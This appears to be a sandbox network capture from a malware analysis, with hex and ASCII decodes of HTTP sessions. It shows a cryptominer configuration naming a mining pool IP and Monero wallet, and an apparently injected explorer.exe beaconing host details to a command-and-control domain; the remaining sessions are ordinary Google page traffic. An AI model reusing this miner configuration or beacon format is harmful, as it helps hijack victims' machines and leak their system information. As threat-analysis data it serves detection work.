2024-12-12 21:40:14 UTC	480	IN	Data Raw: 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 31 38 35 2e 31 35 37 2e 31 36 32 2e 32 31 36 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 34 34 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 34 36 59 73 4a 65 4e 67 37 38 41 46 65 41 73 56 41 53 38 41 47 54 44 35 6e 66 4e 68 53 66 72 71 4e 41 4c 69 77 70 6e 4a 68 42 6b 58 63 67 52 67 67 70 79 6b 61 4b 5a 59 6a 70 33 59 53 77 59 52 44 32 41 31 63 45 48 71 71 6b 75 71 44 4b 48 58 57 6a 34 58 53 56 6a 78 47 38 61 73 65 6a 42 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 74 72 75 65 2c 0d 0a 20 20 20 20 22 73 73 6c 74 6c 73 22 3a 20 74 72 75 65 2c 0d 0a 20 Data Ascii: { "algo": "rx/0", "pool": "185.157.162.216", "port": 4444, "wallet": "46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB", "password": "", "nicehash": true, "ssltls": true,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49713	154.216.20.243	443	7236	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:16 UTC	179	OUT	POST /66/api/endpoint.php HTTP/1.1 Accept: / Connection: close Content-Length: 381 Content-Type: application/json Host: woo097878781.win User-Agent: cpp-httplib/0.12.6
2024-12-12 21:40:16 UTC	381	OUT	Data Raw: 7b 22 69 64 22 3a 22 79 66 71 68 65 73 77 6c 61 7a 6c 7a 6f 78 6d 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 32 35 38 35 35 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 67 70 75 22 3a 22 4f 54 4e 43 32 5f 37 4c 4d 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 6f 30 39 37 38 37 38 37 38 31 2e 77 69 6e 2f 50 2e 74 78 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a Data Ascii: {"id":"yfqheswlazlzoxmx","computername":"258555","username":"user","gpu":"OTNC2_7LM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":
2024-12-12 21:40:16 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 12 Dec 2024 21:40:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.3.14 X-Robots-Tag: noindex, nofollow Vary: Accept-Encoding X-Powered-By: PleskLin
2024-12-12 21:40:16 UTC	28	IN	Data Raw: 31 31 0d 0a 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 11{"response":"ok"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49715	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:16 UTC	802	OUT	GET / HTTP/1.1 Host: www.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-12 21:40:17 UTC	1768	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 21:40:17 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-PJjfH0QIYqHhg86xOxlZmQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; expires=Tue, 10-Jun-2025 21:40:17 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; expires=Fri, 13-Jun-2025 21:40:17 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-12 21:40:17 UTC	1768	IN	Data Raw: 31 63 30 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 41 6e 6d 2b 68 68 74 75 68 37 4e 4a 67 75 71 53 6e 58 48 45 41 49 71 71 4d 61 56 2b 47 58 43 6b 73 38 57 59 58 48 4a 4b 46 37 6c 36 41 65 59 4d 6a 2b 77 4f 2b 66 69 39 4f 64 44 71 46 6e 4a 54 67 39 74 30 34 39 32 44 79 6b 56 78 78 34 6a 70 76 46 62 78 6e 41 Data Ascii: 1c0d<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="Anm+hhtuh7NJguqSnXHEAIqqMaV+GXCks8WYXHJKF7l6AeYMj+wO+fi9OdDqFnJTg9t0492DykVxx4jpvFbxnA
2024-12-12 21:40:17 UTC	1768	IN	Data Raw: 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 79 3d 7b Data Ascii: b,d,c,h,e){e=e===void 0?k:e;d\|\|(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(function(){google.y={
2024-12-12 21:40:17 UTC	1768	IN	Data Raw: 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 26 26 22 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 22 69 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 2c 61 61 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 6e 73 2c 74 3d 72 3f 61 61 7c 7c 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 3a 76 6f 69 64 20 30 3b 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 2d 28 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 70 6e 6f 7c 7c 30 29 7d 76 61 72 20 62 61 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 Data Ascii: erformance.timing&&"navigationStart"in window.performance.timing,aa=google.stvsc&&google.stvsc.ns,t=r?aa\|\|window.performance.timing.navigationStart:void 0;function u(){return window.performance.now()-(google.stvsc&&google.stvsc.pno\|\|0)}var ba=google.stvsc
2024-12-12 21:40:17 UTC	1768	IN	Data Raw: 2e 63 2e 64 63 6c 74 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 61 2c 62 2c 63 29 7b 67 6f 6f 67 6c 65 2e 74 69 63 6b 28 22 6c 6f 61 64 22 2c 61 2c 62 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 41 28 61 2c 62 29 7b 67 6f 6f 67 6c 65 2e 63 2e 65 28 22 6c 6f 61 64 22 2c 61 2c 53 74 72 69 6e 67 28 62 29 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 42 28 29 7b 72 65 74 75 72 6e 20 6d 61 3f 67 6f 6f 67 6c 65 2e 63 2e 77 68 3e 31 3a 21 30 7d 3b 76 61 72 20 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 74 68 69 73 2e 67 3d 61 3b 74 68 69 73 2e 76 3d 5b 5d 3b 74 68 69 73 2e 42 3d 74 68 69 73 2e 67 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 61 66 74 22 29 3b 74 68 69 73 2e 6a 3d 21 21 74 68 69 73 2e 67 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 Data Ascii: .c.dclt;function z(a,b,c){google.tick("load",a,b,c)}function A(a,b){google.c.e("load",a,String(b))};function B(){return ma?google.c.wh>1:!0};var qa=function(a,b,c){this.g=a;this.v=[];this.B=this.g.hasAttribute("data-noaft");this.j=!!this.g.getAttribute("d
2024-12-12 21:40:17 UTC	117	IN	Data Raw: 28 48 28 61 2c 76 6f 69 64 20 30 2c 21 30 2c 21 30 29 2c 62 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4a 28 61 29 7b 67 6f 6f 67 6c 65 2e 63 2e 6f 69 6c 28 61 29 7d 3b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 74 61 72 74 54 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 61 0d 0a Data Ascii: (H(a,void 0,!0,!0),b)}}function J(a){google.c.oil(a)};google.timers={};google.startTick=function(a){google.timers[a
2024-12-12 21:40:17 UTC	269	IN	Data Raw: 31 30 36 0d 0a 5d 3d 7b 74 3a 7b 73 74 61 72 74 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 2c 65 3a 7b 7d 2c 6d 3a 7b 7d 7d 7d 3b 67 6f 6f 67 6c 65 2e 74 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 61 5d 7c 7c 67 6f 6f 67 6c 65 2e 73 74 61 72 74 54 69 63 6b 28 61 29 3b 63 3d 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 44 61 74 65 2e 6e 6f 77 28 29 3b 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 7c 7c 28 62 3d 5b 62 5d 29 3b 66 6f 72 28 76 61 72 20 66 3d 30 2c 68 3b 68 3d 62 5b 66 2b 2b 5d 3b 29 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 61 5d 2e 74 5b 68 5d 3d 63 3b 64 26 26 74 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 26 26 28 61 3d 63 2d 74 2c 61 3e 30 26 26 70 65 72 66 6f 72 6d 61 Data Ascii: 106]={t:{start:Date.now()},e:{},m:{}}};google.tick=function(a,b,c,d){google.timers[a]\|\|google.startTick(a);c=c!==void 0?c:Date.now();b instanceof Array\|\|(b=[b]);for(var f=0,h;h=b[f++];)google.timers[a].t[h]=c;d&&t&&performance.mark&&(a=c-t,a>0&&performa
2024-12-12 21:40:17 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 73 74 61 72 74 54 69 6d 65 3a 61 7d 29 29 7d 3b 67 6f 6f 67 6c 65 2e 63 2e 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 61 5d 2e 65 5b 62 5d 3d 63 7d 3b 67 6f 6f 67 6c 65 2e 63 2e 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 62 7c 7c 22 6c 6f 61 64 22 5d 2e 6d 3b 62 5b 61 5d 26 26 67 6f 6f 67 6c 65 2e 6d 6c 28 45 72 72 6f 72 28 22 61 22 29 2c 21 31 2c 7b 6d 3a 61 7d 29 3b 62 5b 61 5d 3d 21 30 7d 3b 67 6f 6f 67 6c 65 2e 63 2e 75 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 62 7c 7c 22 6c 6f 61 64 22 5d 3b 62 3d 63 2e 6d 3b 69 66 28 62 5b 61 5d 29 7b 62 5b 61 5d 3d 21 31 3b 66 6f Data Ascii: 8000startTime:a}))};google.c.e=function(a,b,c){google.timers[a].e[b]=c};google.c.b=function(a,b){b=google.timers[b\|\|"load"].m;b[a]&&google.ml(Error("a"),!1,{m:a});b[a]=!0};google.c.u=function(a,b){var c=google.timers[b\|\|"load"];b=c.m;if(b[a]){b[a]=!1;fo
2024-12-12 21:40:17 UTC	1390	IN	Data Raw: 6c 6f 61 64 22 2c 22 66 68 74 22 2c 62 29 3b 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 61 29 7b 4c 28 61 2e 74 69 6d 65 53 74 61 6d 70 29 26 26 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 4d 2c 21 30 29 7d 67 6f 6f 67 6c 65 2e 63 2e 66 68 3d 49 6e 66 69 6e 69 74 79 3b 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 4d 2c 21 30 29 3b 4c 28 30 29 3b 78 26 26 28 67 6f 6f 67 6c 65 2e 63 2e 6f 69 6c 3d 73 61 2c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 Data Ascii: load","fht",b);return!0}return!1}function M(a){L(a.timeStamp)&&document.removeEventListener("visibilitychange",M,!0)}google.c.fh=Infinity;document.addEventListener("visibilitychange",M,!0);L(0);x&&(google.c.oil=sa,document.documentElement.addEventListener
2024-12-12 21:40:17 UTC	1390	IN	Data Raw: 2d 64 29 3b 62 3d 62 2e 65 3b 61 3d 22 2f 67 65 6e 5f 32 30 34 3f 73 3d 22 2b 67 6f 6f 67 6c 65 2e 73 6e 2b 22 26 74 3d 22 2b 61 2b 22 26 61 74 79 70 3d 63 73 69 26 65 69 3d 22 2b 67 6f 6f 67 6c 65 2e 6b 45 49 2b 22 26 72 74 3d 22 3b 64 3d 22 22 3b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 63 29 61 2b 3d 22 22 2b 64 2b 65 2b 22 2e 22 2b 63 5b 65 5d 2c 64 3d 22 2c 22 3b 66 6f 72 28 76 61 72 20 67 20 69 6e 20 62 29 61 2b 3d 22 26 22 2b 67 2b 22 3d 22 2b 62 5b 67 5d 3b 65 3d 22 22 3b 70 2e 5f 63 73 68 69 64 26 26 28 65 2b 3d 22 26 63 73 68 69 64 3d 22 2b 0a 70 2e 5f 63 73 68 69 64 29 3b 28 67 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 6b 4f 50 49 7c 7c 6e 75 6c 6c 29 26 26 28 65 2b 3d 22 26 6f 70 69 3d 22 2b 67 29 Data Ascii: -d);b=b.e;a="/gen_204?s="+google.sn+"&t="+a+"&atyp=csi&ei="+google.kEI+"&rt=";d="";for(var e in c)a+=""+d+e+"."+c[e],d=",";for(var g in b)a+="&"+g+"="+b[g];e="";p._cshid&&(e+="&cshid="+p._cshid);(g=window.google&&window.google.kOPI\|\|null)&&(e+="&opi="+g)
2024-12-12 21:40:17 UTC	1390	IN	Data Raw: 3d 63 3a 21 31 3b 56 7c 7c 21 64 26 26 21 66 7c 7c 28 56 3d 61 2c 55 3d 62 29 3b 69 66 28 56 29 7b 76 61 72 20 68 3d 30 2c 6b 3d 30 2c 6d 3d 30 2c 6e 3d 21 31 3b 53 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 28 45 28 65 29 26 31 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 65 2e 41 29 72 65 74 75 72 6e 2b 2b 6d 2c 21 65 2e 42 3b 45 28 65 29 26 34 26 26 28 6e 3d 21 30 29 3b 65 2e 6a 26 26 2b 2b 6b 3b 2b 2b 68 3b 72 65 74 75 72 6e 21 30 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 41 28 22 69 6d 61 22 2c 68 29 3b 41 28 22 69 6d 61 64 22 2c 6b 29 3b 41 28 22 69 6d 61 63 22 2c 6d 29 3b 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 49 62 37 45 66 63 22 29 2e 6c 65 6e 67 74 68 7c 7c 67 6f 6f 67 6c 65 2e 63 Data Ascii: =c:!1;V\|\|!d&&!f\|\|(V=a,U=b);if(V){var h=0,k=0,m=0,n=!1;S(function(e){if(!(E(e)&1))return!1;if(e.A)return++m,!e.B;E(e)&4&&(n=!0);e.j&&++k;++h;return!0},function(){A("ima",h);A("imad",k);A("imac",m);(document.getElementsByClassName("Ib7Efc").length\|\|google.c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49722	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:19 UTC	1729	OUT	GET /xjs/_/ss/k=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA/d=1/ed=1/br=1/rs=ACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,YV5bee,d,csi HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:20 UTC	809	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/css; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 7763 Date: Thu, 12 Dec 2024 21:40:20 GMT Expires: Fri, 12 Dec 2025 21:40:20 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 17:02:52 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:20 UTC	581	IN	Data Raw: 3a 72 6f 6f 74 7b 2d 2d 43 4f 45 6d 59 3a 23 31 66 31 66 31 66 3b 2d 2d 78 68 55 47 77 63 3a 23 66 66 66 7d 3a 72 6f 6f 74 7b 2d 2d 76 5a 65 30 6a 62 3a 23 61 38 63 37 66 61 3b 2d 2d 6e 77 58 6f 62 62 3a 23 36 33 38 65 64 34 3b 2d 2d 56 75 5a 58 42 64 3a 23 30 30 31 64 33 35 3b 2d 2d 75 4c 7a 33 37 63 3a 23 35 34 35 64 37 65 3b 2d 2d 6a 49 4e 75 36 63 3a 23 30 30 31 64 33 35 3b 2d 2d 54 79 56 59 6c 64 3a 23 30 62 35 37 64 30 3b 2d 2d 5a 45 70 50 6d 64 3a 23 63 33 64 39 66 62 3b 2d 2d 51 57 61 61 61 66 3a 23 36 33 38 65 64 34 3b 2d 2d 44 45 65 53 74 66 3a 23 66 35 66 38 66 66 3b 2d 2d 54 53 57 5a 49 62 3a 23 65 35 65 64 66 66 3b 2d 2d 42 52 4c 77 45 3a 23 64 33 65 33 66 64 3b 2d 2d 67 53 35 6a 58 62 3a 23 64 61 64 63 65 30 3b 2d 2d 41 71 6e 37 78 64 3a 23 Data Ascii: :root{--COEmY:#1f1f1f;--xhUGwc:#fff}:root{--vZe0jb:#a8c7fa;--nwXobb:#638ed4;--VuZXBd:#001d35;--uLz37c:#545d7e;--jINu6c:#001d35;--TyVYld:#0b57d0;--ZEpPmd:#c3d9fb;--QWaaaf:#638ed4;--DEeStf:#f5f8ff;--TSWZIb:#e5edff;--BRLwE:#d3e3fd;--gS5jXb:#dadce0;--Aqn7xd:#
2024-12-12 21:40:20 UTC	1390	IN	Data Raw: 7d 2e 41 42 4d 46 5a 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 31 30 30 6d 73 2c 76 69 73 69 62 69 6c 69 74 79 20 30 73 20 32 35 30 6d 73 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 69 6e 73 65 74 3a 30 7d 2e 6a 62 42 49 74 66 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 44 55 30 4e 4a 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 6c 50 33 4a 6f 66 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6e 4e 4d 75 4f 64 7b 61 6e Data Ascii: }.ABMFZ{transition:background-color 100ms,visibility 0s 250ms;position:fixed;visibility:hidden;inset:0}.jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:relative}.nNMuOd{an
